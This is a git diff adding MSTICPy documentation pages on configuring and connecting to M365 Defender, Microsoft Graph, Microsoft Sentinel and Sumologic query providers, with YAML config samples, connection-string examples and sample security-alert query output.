+Creating a Client App for M365 Defender
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Details on registering an Azure AD application for MS 365 Defender can be found
+`here <https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/exposed-apis-create-app-webapp>`__.
+Once you have registered the application, you can use it to connect to
+the MS Defender API.
+
+M365 Defender Configuration in MSTICPy
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can store your connection details in *msticpyconfig.yaml*.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+The settings in the file should look like the following:
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      MicrosoftDefender:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret: "CLIENT SECRET"
+            TenantId: "TENANT ID"
+
+
+We strongly recommend storing the client secret value
+in Azure Key Vault. You can replace the text value with a referenced
+to a Key Vault secret using the MSTICPy configuration editor.
+See :doc:`msticpy Settings Editor <../getting_started/SettingsEditor>`)
+
+Your configuration when using Key Vault should look like the following:
+
+.. code:: yaml
+
+      MicrosoftDefender:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret:
+                KeyVault:
+            TenantId: "TENANT ID"
+
+You can create multiple instances of M365 Defender settings by adding
+an instance string to the "MicrosoftDefender" section name.
+
+.. code:: yaml
+
+      MicrosoftDefender-Tenant1:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret:
+                KeyVault:
+            TenantId: "TENANT ID"
+      MicrosoftDefender-Tenant2:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret:
+                KeyVault:
+            TenantId: "TENANT ID"
+
+
+Loading a QueryProvider for M365 Defender
+-----------------------------------------
+
+.. code:: ipython3
+
+        mdatp_prov = QueryProvider("M365D")
+
+You can also use the aliases "MDE" and "MDATP".
+
+Connecting to M365 Defender
+---------------------------
+
+The parameters required for connection to Defender can be passed in
+a number of ways. The simplest is to configure your settings
+in msticpyconfig. You can then just call connect with no parameters.
+
+.. code:: ipython3
+
+        mdatp_prov.connect()
+
+
+If you have configured multiple instances you must specify
+an instance name when you call connect.
+
+.. code:: ipython3
+
+        mdatp_prov.connect(instance="Tenant2")
+
+
+You can also pass connection parameters as
+keyword arguments or a connection string.
+
+To specify connection parameters as keyword arguments in the function call,
+the required parameters are:
+
+* tenant_id -- The tenant ID of the Defender workspace to connect to.
+* client_id -- The ID of the application registered for MS Defender.
+* client_secret -- The secret used for by the application.
+
+
+.. code:: ipython3
+
+        ten_id = input('Tenant ID')
+        client_id = input('Client ID')
+        client_secret = input('Client Secret')
+        md_prov = QueryProvider('M365D')
+        md_prov.connect(tenant_id=ten_id, client_id=client_id, client_secret=client_secret)
+
+You can also specify these parameters as a connection string of the form:
+
+"tenant_id='*my_tenant*'; client_id='*my_appid*'; client_secret='*my_secret*'"
+
+.. code:: ipython3
+
+    # The use of parentheses here is just to concatenate the strings
+    # inside the parentheses, to create a single string.
+    conn_str = (
+        "tenant_id='243bb6be-4136-4b64-9055-fb661594199a'; "
+        "client_id='a5b24e23-a96a-4472-b729-9e5310c83e20'; "
+        "client_secret='[PLACEHOLDER]'"
+    )
+    md_prov.connect(conn_str)
+
+Other M365 Defender Documentation
+---------------------------------
+
+For examples of using the MS Defender provider, see the sample
+`M365 Defender Notebook<https://github.com/microsoft/msticpy/blob/master/docs/notebooks/MDATPQuery.ipynb>`
+
+Built-in :ref:`data_acquisition/DataQueries:Queries for Microsoft 365 Defender`.
+
+:py:mod:`M365 Defender driver API documentation<msticpy.data.drivers.mdatp_driver>`
diff --git a/docs/source/data_acquisition/DataProv-MSGraph.rst b/docs/source/data_acquisition/DataProv-MSGraph.rst
new file mode 100644
index 000000000..824796a11
--- /dev/null
+++ b/docs/source/data_acquisition/DataProv-MSGraph.rst
@@ -0,0 +1,144 @@
+
+Microsoft Graph API Provider
+============================
+
+
+Connecting to the Security Graph API follows the same format as MS Defender
+connections with connection variables passed to the function in the
+same way. The configuration format is also identical to that specified in the
+previous section.
+
+Microsoft Graph Configuration
+-----------------------------
+
+Creating a Client App for Microsoft Graph
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Details for registering an application for the Microsoft Graph API can
+be found `here <https://docs.microsoft.com/graph/auth-register-app-v2?context=graph%2Fapi%2F1.0&view=graph-rest-1.0>`__.
+
+
+Microsoft Graph Configuration in MSTICPy
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can store your connection details in *msticpyconfig.yaml*.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+The settings in the file should look like the following:
+
+.. code:: yaml
+
+    DataProviders:
+      ...
+      MicrosoftGraph:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret: "CLIENT SECRET"
+            TenantId: "TENANT ID"
+
+
+We strongly recommend storing the client secret value
+in Azure Key Vault. You can replace the text value with a referenced
+to a Key Vault secret using the MSTICPy configuration editor.
+
+Your configuration when using Key Vault should look like the following:
+
+.. code:: yaml
+
+      MicrosoftGraph:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret:
+                KeyVault:
+            TenantId: "TENANT ID"
+
+You can create multiple instances of Microsoft Graph settings by adding
+an instance string to the "MicrosoftGraph" section name.
+
+.. code:: yaml
+
+      MicrosoftGraph-Tenant1:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret:
+                KeyVault:
+            TenantId: "TENANT ID"
+      MicrosoftGraph-Tenant2:
+          Args:
+            ClientId: "CLIENT ID"
+            ClientSecret:
+                KeyVault:
+            TenantId: "TENANT ID"
+
+Loading a QueryProvider for Microsoft Graph
+-------------------------------------------
+
+.. code:: ipython3
+
+        msg_prov = QueryProvider("SecurityGraph")
+
+
+Connecting to Microsoft Graph
+-----------------------------
+
+The parameters required for connection to MS Graph can be passed in
+a number of ways. The simplest is to configure your settings
+in msticpyconfig. You can then just call connect with no parameters.
+
+.. code:: ipython3
+
+        msg_prov.connect()
+
+
+If you have configured multiple instances you must specify
+an instance name when you call connect.
+
+.. code:: ipython3
+
+        msg_prov.connect(instance="Tenant2")
+
+
+You can also pass connection parameters as
+keyword arguments or a connection string.
+
+To specify connection parameters as keyword arguments in the function call,
+the required parameters are:
+
+* tenant_id -- The tenant ID of the Defender workspace to connect to.
+* client_id -- The ID of the application registered for MS Defender.
+* client_secret -- The secret used for by the application.
+
+
+.. code:: ipython3
+
+        ten_id = input('Tenant ID')
+        client_id = input('Client ID')
+        client_secret = input('Client Secret')
+        msg_prov = QueryProvider('SecurityGraph')
+        msg_prov.connect(tenant_id=ten_id, client_id=client_id, client_secret=client_secret)
+
+You can also specify these parameters as a connection string of the form:
+
+"tenant_id='*my_tenant*'; client_id='*my_appid*'; client_secret='*my_secret*'"
+
+.. code:: ipython3
+
+    # The use of parentheses here is just to concatenate the strings
+    # inside the parentheses, to create a single string.
+    conn_str = (
+        "tenant_id='243bb6be-4136-4b64-9055-fb661594199a'; "
+        "client_id='a5b24e23-a96a-4472-b729-9e5310c83e20'; "
+        "client_secret='[PLACEHOLDER]'"
+    )
+    msg_prov.connect(conn_str)
+
+
+Other Microsoft Graph Documentation
+-----------------------------------
+
+Built-in :ref:`data_acquisition/DataQueries:Queries for Microsoft Graph`.
+
+:py:mod:`Microsoft Graph driver API documentation<msticpy.data.drivers.security_graph_driver>`
\ No newline at end of file
diff --git a/docs/source/data_acquisition/DataProv-MSSentinel.rst b/docs/source/data_acquisition/DataProv-MSSentinel.rst
new file mode 100644
index 000000000..e470117f9
--- /dev/null
+++ b/docs/source/data_acquisition/DataProv-MSSentinel.rst
@@ -0,0 +1,231 @@
+Microsoft Sentinel Provider
+===========================
+
+Sentinel Configuration
+----------------------
+
+You can store configuration for your workspace (or workspaces) in either
+your ``msticpconfig.yaml`` or a ``config.json`` file. The latter
+file is auto-created in your Azure Machine Learning (AML) workspace when
+you launch a notebook from the Sentinel portal. It can however, only
+store details for a single workspace.
+
+Sentinel Configuration in *msticpyconfig.yaml*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This is the simplest place to store your workspace details.
+
+You likely need to use a *msticpyconfig.yaml* anyway. If you are using other
+*msticpy* features such as Threat Intelligence Providers, GeoIP Lookup, Azure Data,
+etc., these all have their own configuration settings, so using a single
+configuration file makes managing your settings easier. If you are running
+notebooks in an AML workspace and you do not have a *msticpyconfig.yaml*
+*MSTICPy* will create one and import settings from a *config.json*, if it can find
+one.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+The MS Sentinel connection settings are stored in the
+``AzureSentinel\\Workspaces`` section of the file. Here is an example.
+
+.. code:: yaml
+
+    AzureSentinel:
+      Workspaces:
+        # Workspace used if you don't explicitly name a workspace when creating WorkspaceConfig
+        # Specifying values here overrides config.json settings unless you explicitly load
+        # WorkspaceConfig with config_file parameter (WorkspaceConfig(config_file="../config.json")
+        Default:
+          WorkspaceId: 271f17d3-5457-4237-9131-ae98a6f55c37
+          TenantId: 335b56ab-67a2-4118-ac14-6eb454f350af
+          ResourceGroup: soc
+          SubscriptionId: a5b24e23-a96a-4472-b729-9e5310c83e20
+          Workspace Name: Workspace1
+        # To use these launch with an explicit name - WorkspaceConfig(workspace_name="Workspace2")
+        Workspace1:
+          WorkspaceId: "c88dd3c2-d657-4eb3-b913-58d58d811a41"
+          TenantId: "335b56ab-67a2-4118-ac14-6eb454f350af"
+          ResourceGroup: soc
+          SubscriptionId: a5b24e23-a96a-4472-b729-9e5310c83e20
+          Workspace Name: Workspace1
+        TestWorkspace:
+          WorkspaceId: "17e64332-19c9-472e-afd7-3629f299300c"
+          TenantId: "4ea41beb-4546-4fba-890b-55553ce6003a"
+          ResourceGroup: soc
+          SubscriptionId: a5b24e23-a96a-4472-b729-9e5310c83e20
+          Workspace Name: Workspace2
+
+If you only use a single workspace, you only need to create a ``Default`` entry and
+add the values for your *WorkspaceID* and *TenantID*. You can add other entries here,
+for example, SubscriptionID, ResourceGroup. These are recommended but not required
+for the QueryProvider (they may be used by other *MSTICPy* components however).
+
+.. note:: The property names are spelled differently to the values in the
+   *config.json* so be sure to enter these as shown in the example. These
+   names are case-sensitive.
+
+.. note:: The section names (Default, Workspace1 and TestWorkspace) do
+   not have to be the same as the workspace name - you can choose friendlier
+   aliases, if you wish.
+
+If you use multiple workspaces, you can add further entries here. Each
+workspace entry is normally the name of the Azure Sentinel workspace but
+you can use any name you prefer.
+
+Sentinel Configuration in *config.json*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When you load a notebook from the MS Sentinel UI a configuration file *config.json*
+is provisioned for you with the details of the source workspace populated in
+the file. An example is shown here.
+
+.. code:: json
+
+    {
+        "tenant_id": "335b56ab-67a2-4118-ac14-6eb454f350af",
+        "subscription_id": "b8f250f8-1ba5-4b2c-8e74-f7ea4a1df8a6",
+        "resource_group": "ExampleWorkspaceRG",
+        "workspace_id": "271f17d3-5457-4237-9131-ae98a6f55c37",
+        "workspace_name": "ExampleWorkspace"
+    }
+
+If no *msticpyconfig.yaml* is found *MSTICPy* will automatically look for a
+*config.json* file in the current
+directory. If not found here, it will search the parent directory and in all
+its subdirectories. It will use the first *config.json* file found.
+
+
+Loading a QueryProvider for Microsoft Sentinel
+----------------------------------------------
+
+.. code:: ipython3
+
+    qry_prov = QueryProvider(
+        data_environment="MSSentinel",
+    )
+
+.. note::"LogAnalytics" and "AzureSentinel" are also aliases
+   for "MSSentinel"
+
+
+Connecting to a MS Sentinel Workspace
+-------------------------------------
+
+Once we have instantiated the QueryProvider we need to authenticate to Sentinel
+Workspace. This is done by calling the connect() function of the Query
+Provider.
+
+connect() requires a connection string as its parameter. For MS Sentinel
+we can use the ``WorkspaceConfig`` class.
+
+WorkspaceConfig
+~~~~~~~~~~~~~~~
+
+This handles loading your workspace configuration and generating a
+connection string from your configuration.
+See :py:mod:`WorkspaceConfig API documentation<msticpy.common.wsconfig>`
+
+``WorkspaceConfig``  works with workspace configuration stored in *msticpyconfig.yaml*
+or *config.json* (although the former takes precedence).
+
+To use ``WorkspaceConfig``, simple create an instance of it. It will automatically build
+your connection string for use with the query provider library.
+
+.. code:: IPython
+
+    >>> ws_config = WorkspaceConfig()
+    >>> ws_config.code_connect_str
+
+    "loganalytics://code().tenant('335b56ab-67a2-4118-ac14-6eb454f350af').workspace('271f17d3-5457-4237-9131-ae98a6f55c37')"
+
+You can use this connection string in the call to ``QueryProvider.connect()``
+
+When called without parameters, *WorkspaceConfig* loads the "Default"
+entry in your *msticpyconfig.yaml* (or falls back to loading the settings
+in *config.json*). To specify a different workspace pass the ``workspace`` parameter
+with the name of your workspace entry. This value is the name of
+the section in the *msticpyconfig* ``Workspaces`` section, which may
+not necessarily be the same as your workspace name.
+
+.. code:: IPython
+
+    >>> ws_config = WorkspaceConfig(workspace="TestWorkspace")
+
+
+To see which workspaces are configured in your *msticpyconfig.yaml* use
+the ``list_workspaces()`` function.
+
+.. tip:: ``list_workspaces`` is a class function, so you do not need to
+   instantiate a WorkspaceConfig to call this function.
+
+.. code:: IPython
+
+    >>> WorkspaceConfig.list_workspaces()
+
+    {'Default': {'WorkspaceId': '271f17d3-5457-4237-9131-ae98a6f55c37',
+      'TenantId': '335b56ab-67a2-4118-ac14-6eb454f350af'},
+     'Workspace1': {'WorkspaceId': 'c88dd3c2-d657-4eb3-b913-58d58d811a41',
+       'TenantId': '335b56ab-67a2-4118-ac14-6eb454f350af'},
+     'TestWorkspace': {'WorkspaceId': '17e64332-19c9-472e-afd7-3629f299300c',
+       'TenantId': '4ea41beb-4546-4fba-890b-55553ce6003a'}}
+
+Entries in msticpyconfig always take precedence over settings in your
+config.json. If you want to force use of the config.json, specify the path
+to the config.json file in the ``config_file`` parameter to ``WorkspaceConfig``.
+
+Connecting to the workspace
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When connecting you can just pass an instance of WorkspaceConfig to
+the query provider's ``connect`` method.
+
+.. code:: IPython
+
+    qry_prov.connect(WorkspaceConfig())
+    # or
+    qry_prov.connect(WorkspaceConfig(workspace="TestWorkspace"))
+
+If you need use a specific instance of a config.json you can specify a full
+path to the file you want to use when you create your ``WorkspaceConfig``
+instance.
+
+
+MS Sentinel Authentication options
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+By default, the data provider tries to use chained authentication,
+attempting to use existing Azure credentials, if they are available.
+
+- If you are running in an AML workspace, it will attempt to use
+  integrated MSI authentication, using the identity that you used to
+  authenticate to AML.
+- If you have logged in to Azure CLI, the Sentinel provider will
+  try to use your AzureCLI credentials
+- If you have your credentials stored as environment variables, it
+  will try to use those
+- Finally, it will fall back on using interactive browser-based
+  device authentication.
+
+If you are using a Sovereign cloud rather than the Azure global cloud,
+you should select the appropriate cloud in the Azure section of
+the *msticpyconfig*.
+
+.. warning:: Although msticpy allows you to configure multiple entries for
+   workspaces in different tenants, you cannot currently authenticate to workspaces
+   that span multiple tenants in the same notebook. If you need to do this, you
+   should investigate
+   `Azure Lighthouse <https://azure.microsoft.com/services/azure-lighthouse/>`__.
+   This allows delegated access to workspaces in multiple tenants from a single
+   tenant.
+
+Other MS Sentinel Documentation
+-------------------------------
+
+For examples of using the MS Defender provider, see the sample
+`M365 Defender Notebook<https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Data_Queries.ipynb>`
+
+Built-in :ref:`data_acquisition/DataQueries:Queries for Microsoft Sentinel`.
+
+:py:mod:`Sentinel KQL driver API documentation<msticpy.data.drivers.kql_driver>`
diff --git a/docs/source/data_acquisition/DataProv-Sumologic.rst b/docs/source/data_acquisition/DataProv-Sumologic.rst
new file mode 100644
index 000000000..9ad6696de
--- /dev/null
+++ b/docs/source/data_acquisition/DataProv-Sumologic.rst
@@ -0,0 +1,107 @@
+Sumologic Provider
+==================
+
+Sumologic Configuration
+-----------------------
+
+You can store your connection details in *msticpyconfig.yaml*.
+
+For more information on using and configuring *msticpyconfig.yaml* see
+:doc:`msticpy Package Configuration <../getting_started/msticpyconfig>`
+and :doc:`MSTICPy Settings Editor<../getting_started/SettingsEditor>`
+
+The settings in the file should look like the following:
+
+.. code:: yaml
+
+    DataProviders:
+      Sumologic:
+        Args:
+          connection_str: Sumologic_url_endpoint
+          accessid: accessid   # with search permissions to connect
+          accesskey: accesskey
+
+We strongly recommend storing the client secret value
+in Azure Key Vault. You can replace the text value with a referenced
+to a Key Vault secret using the MSTICPy configuration editor.
+
+Your configuration when using Key Vault should look like the following:
+
+.. code:: yaml
+
+    DataProviders:
+      Sumologic:
+        Args:
+          connection_str: Sumologic_url_endpoint
+          accessid: accessid   # with search permissions to connect
+          accesskey:
+            KeyVault:
+
+Loading a QueryProvider for Sumologic
+-------------------------------------------
+
+.. code:: ipython3
+
+        qry_prov = QueryProvider("Sumologic")
+
+
+Connecting to Sumologic
+-----------------------------
+
+The parameters required for connection to Sumologic can be passed in
+a number of ways. The simplest is to configure your settings
+in msticpyconfig. You can then just call connect with no parameters.
+
+Alternatively, you can pass the required connection parameters
+to the driver as parameters to the driver.
+
+.. code:: ipython3
+
+        qry_prov.connect()
+
+
+If you have configured multiple instances you must specify
+an instance name when you call connect.
+
+.. code:: ipython3
+
+        qry_prov.connect(instance="Tenant2")
+
+Running a Sumologic query
+-------------------------
+
+Sumologic supports a number of optional query time parameters.
+Details of those parameters can be found here
+:py:meth:`msticpy.data.drivers.sumologic_driver.query`
+
+.. code:: ipython3
+
+    sumologic_query = """
+        *
+        | formatDate(_messageTime,"yyyy/dd/MM HH:mm:ss") as date
+        | first(date), last(date) by _sourceCategory
+        | count _sourceCategory,_first,_last
+        | sort -_count
+        """"
+    df = sumologic_prov.exec_query(sumologic_query, days=0.0005, verbosity=3)
+    df.head()
+
+.. code:: ipython3
+
+    sumologic_query = "_index=WINDOWS | count _sourceCategory,hostname"
+    df = sumologic_prov.exec_query(
+        sumologic_query,
+        start=datetime.now() - timedelta(days=6.001),
+        end=datetime.now() - timedelta(days=6)
+    )
+    df.head()
+
+Other Sumologic Documentation
+-----------------------------
+
+For examples of using the Sumologic provider, see the sample
+`Sumologic Notebook<https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Sumologic-DataConnector.ipynb>`
+
+Built-in :ref:`data_acquisition/DataQueries:Queries for Sumologic`.
+
+:py:mod:`Sumologic driver API documentation<msticpy.data.drivers.sumologic_driver>`
diff --git a/docs/source/data_acquisition/DataProviders.rst b/docs/source/data_acquisition/DataProviders.rst
new file mode 100644
index 000000000..e297fdde8
--- /dev/null
+++ b/docs/source/data_acquisition/DataProviders.rst
@@ -0,0 +1,1033 @@
+Query Providers Usage (common to all data sources)
+==================================================
+
+Query providers allow you query data from diverse data sources.
+They support built-in templated queries as well as ad-hoc
+queries. The data is typically returned as a pandas DataFrame.
+
+The package currently support several data drivers giving
+access to environments such as Microsoft Sentinel, Microsoft Defender,
+Splunk and several more.
+
+The Query providers documentation is split between this document,
+which describes usage an functionality common to all of the
+data source drivers. Each provider (like Sentinel and Splunk)
+also has documentation covering specific usage of that
+data environment. These can be found in
+:ref:`DataAcquisition:Individual Data Environments`.
+
+
+Creating a Query Provider
+-------------------------
+
+In order to connect to and query a
+data source we need to create a ``QueryProvider`` instance and tell it
+the Data Environment that we want to connect to and query.
+To view the options available you can call
+QueryProvider.list_data_environments() which will return a list of all
+the available options.
+
+.. code:: ipython3
+
+    QueryProvider.list_data_environments()
+
+.. parsed-literal::
+
+    ['AzureSentinel',
+    'LogAnalytics',
+    'MSSentinel',
+    'Kusto',
+    'AzureSecurityCenter',
+    'SecurityGraph',
+    'MDE',
+    'MDATP',
+    'LocalData',
+    'Splunk',
+    'Mordor',
+    'ResourceGraph',
+    'Sumologic',
+    'M365D']
+
+.. note:: New providers are being added regularly so this list
+    may look a little different. Also some items in this list
+    are aliases (e.g. AzureSentinel and LogAnalytics are aliases
+    of MSSentinel)
+
+After selecting a Data Environment we can initialize our Query Provider
+by calling QueryProvider(*data_environment*), where
+*data_environment* is a string. This will load the relevant
+driver for connecting to the data environment we have selected as well
+as loading any built-in queries available for that environment.
+
+.. code:: ipython3
+
+    qry_prov = QueryProvider(
+        data_environment=DATA_ENVIRONMENT,
+    )
+
+There are two other optional parameters we can pass when initializing
+our Query Providers to further customize it:
+
+1. You can also chose to
+initialize our Query Provider with a driver other than the default one
+for the chosen environment with:
+
+.. code:: ipython3
+
+    qry_prov = QueryProvider(
+        data_environment=DATA_ENVIRONMENT,
+        driver=DRIVER_CLASS_NAME,
+    )
+
+TThe class must be imported before it can be used in this way. You
+would only use this parameter if you were building your own
+data driver backend, which is not common.
+
+2. You can choose to import additional queries from a custom
+query directory (see `Creating new queries`_ for more
+details) with:
+
+.. code:: ipython3
+
+    qry_prov = QueryProvider(
+        data_environment=DATA_ENVIRONMENT,
+        query_paths=QUERY_DIRECTORY_PATH
+    )
+
+
+For more details see :py:class:`QueryProvider API<class:msticpy.data.data_providers.QueryProvider>`.
+
+
+Connecting to a Data Environment
+--------------------------------
+
+Once we have instantiated the query
+provider and loaded the relevant driver we can connect to the Data
+Environment. This is done by calling the connect() function of the Query
+Provider we just initialized and passing it a connection string
+or authentication parameters to use.
+
+Documentation string
+
+::
+
+   connect(self, connection_str: str, **kwargs):
+
+       Connect to data source.
+
+       Parameters
+       ----------
+       connection_string : str
+           Connection string for the data source
+
+
+Example
+
+.. code:: ipython3
+
+    la_connection_string = f'loganalytics://code().tenant("{ten_id}").workspace("{ws_id}")'
+    qry_prov.connect(connection_str=la_connection_string)
+
+
+The format of the parameters supplied to the ``connect`` function varies
+by the environment/driver you are trying to use. Please check
+the details for the environment you are using in the
+`Individual Data Environments/Drivers`__ section.
+
+List of current built-in queries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This page contains a list of current built-in queries
+:doc:`MSTICPy built-in queries <DataQueries>`
+
+
+
+
+
+
+Listing available queries
+-------------------------
+
+Upon connecting to the relevant Data
+Environment we need to look at what query options we have available to
+us. In order to do this we can call
+
+    *query_provider*.list_queries().
+
+This will return a list all queries in our store.
+
+.. note:: An individual query may be listed multiple times if it was
+    added to multiple data families.
+
+The results returned show the data family the query belongs to and the
+name of the specific query.
+
+::
+
+   list_queries(self):
+
+       Return list of family.query in the store.
+
+       Returns
+       -------
+       Iterable[str]
+           List of queries
+
+.. code:: ipython3
+
+    qry_prov.list_queries()
+
+.. parsed-literal::
+
+    LinuxSyslog.all_syslog
+    LinuxSyslog.cron_activity
+    LinuxSyslog.squid_activity
+    LinuxSyslog.sudo_activity
+    LinuxSyslog.user_group_activity
+    LinuxSyslog.user_logon
+    SecurityAlert.get_alert
+    SecurityAlert.list_alerts
+    SecurityAlert.list_alerts_counts
+    SecurityAlert.list_alerts_for_ip
+    SecurityAlert.list_related_alerts
+    WindowsSecurity.get_host_logon
+    WindowsSecurity.get_parent_process
+    WindowsSecurity.get_process_tree
+    WindowsSecurity.list_host_logon_failures
+    WindowsSecurity.list_host_logons
+    WindowsSecurity.list_host_processes
+    WindowsSecurity.list_hosts_matching_commandline
+    WindowsSecurity.list_matching_processes
+    WindowsSecurity.list_processes_in_session
+
+
+Each of these items is a callable function that will return results
+as a pandas DataFrame.
+
+Getting Help for a query
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+To get further details on a specific query call:
+
+qry_prov.{*query_group*}.{*query_name*}(‘?’) or
+
+qry_prov.{*query_group*}.{*query_name*}(‘help’)
+
+or you can use the builtin Python help:
+
+help(qry_prov.{*query_group*}.{*query_name*})
+
+``qry_prov`` is the name of your query provider object.
+
+
+This will display:
+
+-  Query Name
+-  What Data Environment it is designed for
+-  A short description of what the query does
+-  What parameters the query can be passed
+-  The raw (un-parameterized) query that will be run
+
+
+.. code:: ipython3
+
+    qry_prov.SecurityAlert.list_alerts('?')
+
+
+.. parsed-literal::
+
+    Query:  list_alerts
+    Data source:  LogAnalytics
+    Retrieves list of alerts
+
+    Parameters
+    ----------
+    add_query_items: str (optional)
+        Additional query clauses
+    end: datetime
+        Query end time
+    path_separator: str (optional)
+        Path separator
+        (default value is: \\)
+    query_project: str (optional)
+        Column project statement
+        (default value is:  | project-rename StartTimeUtc = StartTime, EndTim...)
+    start: datetime
+        Query start time
+    subscription_filter: str (optional)
+        Optional subscription/tenant filter expression
+        (default value is: true)
+    table: str (optional)
+        Table name
+        (default value is: SecurityAlert)
+    Query:
+     {table} {query_project}
+     | where {subscription_filter}
+     | where TimeGenerated >= datetime({start})
+     | where TimeGenerated <= datetime({end})
+     | extend extendedProps = parse_json(ExtendedProperties)
+     | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+     | project-away extendedProps {add_query_items}
+
+
+
+
+Running a pre-defined query
+---------------------------
+
+To run a query from our query store we
+again call qry_prov.{*query_group*}.{*query_name*}(``**kwargs``) but this time
+we simply pass required parameters for that query as key word arguments.
+
+This will return a Pandas DataFrame of the results with the columns
+determined by the query parameters. Should the query fail for some
+reason an exception will be raised.
+
+.. code:: ipython3
+
+    alerts = qry_prov.SecurityAlert.list_alerts(
+        start='2019-07-21 23:43:18.274492',
+        end='2019-07-27 23:43:18.274492'
+    )
+    alerts.head()
+
+
+===================  =================================================  ==========  =================================================  =========================  ============  ================================================  ==========================================
+TimeGenerated        AlertDisplayName                                   Severity    Description                                        ProviderName               VendorName    ExtendedProperties                                Entities
+===================  =================================================  ==========  =================================================  =========================  ============  ================================================  ==========================================
+2019-07-22 06:35:13  Suspicious authentication activity                 Medium      Although none of them succeeded, some of them ...  Detection                  Microsoft     {\r\n "Activity start time (UTC)": "2019/07/2...  [\r\n {\r\n "$id": "4",\r\n "HostName":...
+2019-07-22 06:35:13  Suspicious authentication activity                 Medium      Although none of them succeeded, some of them ...  Detection                  Microsoft     {\r\n "Activity start time (UTC)": "2019/07/2...  [\r\n {\r\n "$id": "4",\r\n "HostName":...
+2019-07-22 07:02:42  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  AdaptiveNetworkHardenings  Microsoft     {\r\n "Destination Port": "3389",\r\n "Proto...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...
+2019-07-26 06:03:16  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  AdaptiveNetworkHardenings  Microsoft     {\r\n "Destination Port": "22",\r\n "Protoco...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...
+2019-07-23 06:42:01  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  AdaptiveNetworkHardenings  Microsoft     {\r\n "Destination Port": "3389",\r\n "Proto...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...
+===================  =================================================  ==========  =================================================  =========================  ============  ================================================  ==========================================
+
+
+It is also possible to pass queries objects as arguments before defining
+keyword arguments. For example if I wanted to define query times as an
+object rather than defining a start and end via keyword arguments I
+could simply pass a querytimes object to the pre-defined query.
+
+.. code:: ipython3
+
+    query_times = mas.nbwidgets.QueryTime(
+        units='day', max_before=40, max_after=1, before=5
+    )
+    query_times.display()
+
+Running the above cell will display an interactive data range selector. You
+can use that when running a query to automatically supply the ``start`` and
+``end`` parameters for the query
+
+.. code:: ipython3
+
+    qry_prov.SecurityAlert.list_alerts(query_times)
+
+
+===================  =================================================  ==========  =================================================  ================================================  ==========================================  ==============
+TimeGenerated        AlertDisplayName                                   Severity    Description                                        ExtendedProperties                                Entities                                    SourceSystem
+===================  =================================================  ==========  =================================================  ================================================  ==========================================  ==============
+2019-07-26 06:03:16  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  {\r\n "Destination Port": "22",\r\n "Protoco...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...  Detection
+2019-07-23 06:42:01  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  {\r\n "Destination Port": "3389",\r\n "Proto...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...  Detection
+2019-07-22 06:35:13  Suspicious authentication activity                 Medium      Although none of them succeeded, some of them ...  {\r\n "Activity start time (UTC)": "2019/07/2...  [\r\n {\r\n "$id": "4",\r\n "HostName":...  Detection
+2019-07-22 06:35:13  Suspicious authentication activity                 Medium      Although none of them succeeded, some of them ...  {\r\n "Activity start time (UTC)": "2019/07/2...  [\r\n {\r\n "$id": "4",\r\n "HostName":...  Detection
+2019-07-22 07:02:42  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  {\r\n "Destination Port": "3389",\r\n "Proto...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...  Detection
+===================  =================================================  ==========  =================================================  ================================================  ==========================================  ==============
+
+|
+
+Running an ad hoc query
+-----------------------
+
+
+It is also possible to run ad hoc queries
+via a similar method. Rather than calling a named query from the Query
+Provider query store, we can pass a query directly to our Query Provider
+with:
+
+    *query_provider*.exec\_query(query= *query_string*)
+
+This will execute
+the query string passed in the parameters with the driver contained in
+the Query Provider and return data in a Pandas DataFrame. As with
+predefined queries an exception will be raised should the query fail to
+execute.
+
+::
+
+   query(self, query: str) -> Union[pd.DataFrame, Any]:
+       Execute query string and return DataFrame of results.
+
+       Parameters
+       ----------
+       query : str
+           The kql query to execute
+
+       Returns
+       -------
+       Union[pd.DataFrame, results.ResultSet]
+           A DataFrame (if successful) or
+           Kql ResultSet if an error.
+
+.. code:: ipython3
+
+    test_query = '''
